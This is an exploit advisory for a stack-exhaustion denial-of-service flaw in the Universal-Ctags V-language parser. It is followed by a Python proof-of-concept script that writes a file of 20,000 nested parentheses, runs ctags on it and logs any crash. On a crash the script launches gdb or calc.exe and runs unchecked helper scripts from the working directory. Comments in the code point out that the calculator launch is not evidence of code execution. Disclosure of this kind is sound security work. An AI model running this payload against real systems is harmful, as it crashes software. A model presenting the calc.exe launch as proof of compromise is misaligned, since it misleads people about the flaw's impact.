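# =============================================================================================
# Title     : Universal‑Ctags V Language 6.2.1 Parser Uncontrolled Recursion Vulnerability
# Author    : indoushka
# Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)
# Vendor    : https://docs.ctags.io/en/latest/parser-v.html
# =============================================================================================
#
# [+] Summary :
#
#     A security weakness has been discovered in Universal‑Ctags (all versions up to 6.2.1)
#     affecting the V language parser component. The vulnerability is located in the
#     functions:
#
#         parseExpression
#         parseExprList
#
#     within the source file: parsers/v.c.
#
# [+] Description
#
#     Type:      Uncontrolled recursion / stack exhaustion
#     Impact:    Denial of Service (DoS)
#     Trigger:   Malformed V language source file with deeply nested expressions
#     Execution: Local host only
#
# [+] By providing a specially crafted .v file, it is possible to force ctags into infinite
#     or uncontrolled recursion, causing the program to crash. This crash can be exploited
#     for denial-of-service conditions.
#
# [+] POC :
#
# NOTE(review): the listing was published collapsed onto a few lines, so the indentation
# below is reconstructed from the statement order.

import datetime
import os
import platform
import subprocess
import sys


class CrossPlatformCrashHandler:
    """Run ctags on a generated ``.v`` file and record an abnormal exit.

    The harness writes a payload file, runs the target binary on it once, and,
    if the process ended abnormally, saves its captured output under
    ``crash_logs/`` and starts a few optional triage helpers.

    Everything the helpers do is done by this script, not by the parser: the
    advisory above states the impact as denial of service only.
    """

    # NTSTATUS codes of "error" severity have the two top bits set, so a
    # Windows process killed by an unhandled exception (stack overflow is
    # 0xC00000FD) exits with a status at or above this value.
    _NTSTATUS_ERROR_BASE = 0xC0000000

    def __init__(self, binary_path="./ctags"):
        """Store the target path and make sure the log directory exists.

        Args:
            binary_path: Path of the ctags executable to run.
        """
        self.binary_path = binary_path
        self.payload_file = "payload.v"
        self.log_dir = "crash_logs"
        # exist_ok avoids the check-then-create race of exists() + makedirs().
        os.makedirs(self.log_dir, exist_ok=True)

    def generate_payload(self, depth):
        """Write ``depth`` opening parentheses to the payload file.

        Args:
            depth: Number of ``(`` characters, i.e. the nesting depth.
        """
        with open(self.payload_file, "w") as f:
            f.write("(" * depth)

    def run_target(self):
        """Run the target once on the payload file.

        Returns:
            The ``subprocess.CompletedProcess`` with captured text output, or
            ``None`` if the run timed out (10 s) or could not be started.
        """
        try:
            return subprocess.run(
                # os.devnull is "/dev/null" on POSIX and the NUL device on
                # Windows, where a literal "/dev/null" is not a valid sink.
                [self.binary_path, "-f", os.devnull, "--sort=no", self.payload_file],
                capture_output=True,
                text=True,
                timeout=10,
            )
        except subprocess.TimeoutExpired:
            print("[!] Timeout detected")
            return None
        except Exception as e:
            print(f"[!] Execution error: {e}")
            return None

    @staticmethod
    def _terminated_abnormally(returncode, system=None):
        """Tell whether an exit status looks like a crash on this platform.

        Args:
            returncode: Exit status reported by ``subprocess``.
            system: Platform name as returned by ``platform.system()``;
                detected when omitted.

        Returns:
            ``True`` for a negative status (killed by a signal) on POSIX, or
            for a status in the NTSTATUS error range on Windows.
        """
        if system is None:
            system = platform.system()
        if system == "Windows":
            # Windows never reports a negative status for a signal, so the
            # POSIX test alone misses every crash there. This is a heuristic:
            # a program that deliberately exits with such a value also matches.
            return (returncode & 0xFFFFFFFF) >= CrossPlatformCrashHandler._NTSTATUS_ERROR_BASE
        return returncode < 0

    def _launch(self, argv, started_msg, what):
        """Start a helper process without waiting for it; report a failure."""
        try:
            subprocess.Popen(argv)
            print(started_msg)
        except Exception as e:
            print(f"[!] Failed to launch {what}: {e}")

    def handle_crash(self, process):
        """Save the captured output of a crashed run and start triage helpers.

        Args:
            process: The ``CompletedProcess`` returned by ``run_target``.
        """
        timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
        crash_file = os.path.join(self.log_dir, f"crash_{timestamp}.txt")
        with open(crash_file, "w") as f:
            f.write("STDOUT:\n" + (process.stdout or ""))
            f.write("\nSTDERR:\n" + (process.stderr or ""))
        print(f"[+] Crash log saved: {crash_file}")

        system = platform.system()
        if system in ("Linux", "Darwin"):
            self._launch(["gdb", self.binary_path], "[*] Debugger launched (gdb)", "gdb")
        elif system == "Windows":
            # The calculator is started by this harness after it has seen the
            # crash. It shows nothing about the parser and is not evidence of
            # code execution in ctags.
            self._launch(
                ["calc.exe"], "[*] Calculator launched on Windows (PoC)", "calc.exe"
            )

        # The helper scripts below are looked up in the current working
        # directory and run with the caller's privileges, without any check of
        # their content: run the harness only from a directory you control.
        if os.path.exists("post_analysis.py"):
            self._launch(
                [sys.executable, "post_analysis.py"],
                "[*] Analysis script launched",
                "analysis script",
            )

        print("[ALERT] Crash detected and analysis triggered!")

        if system != "Windows" and os.path.exists("inspection.sh"):
            self._launch(
                ["bash", "inspection.sh"],
                "[*] Inspection script launched",
                "inspection script",
            )
        elif system == "Windows" and os.path.exists("inspection.bat"):
            self._launch(
                ["cmd", "/c", "inspection.bat"],
                "[*] Inspection script launched on Windows",
                "inspection batch",
            )

    def automate(self, depth):
        """Generate the payload, run the target once and handle a crash.

        Args:
            depth: Nesting depth passed to ``generate_payload``.
        """
        self.generate_payload(depth)
        process = self.run_target()
        # A timed-out or unstartable run yields None and is reported as
        # "no crash"; the timeout itself is printed by run_target.
        if process is None or not self._terminated_abnormally(process.returncode):
            print("[*] No crash detected.")
            return
        if process.returncode < 0:
            print(f"[!] Crash detected via signal: {-process.returncode}")
        else:
            print(
                f"[!] Crash detected via exit status: 0x{process.returncode & 0xFFFFFFFF:08X}"
            )
        self.handle_crash(process)


if __name__ == "__main__":
    tester = CrossPlatformCrashHandler(binary_path="./ctags")
    tester.automate(20000)

# Greetings to :
# =============================================================================================
# jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)
# =============================================================================================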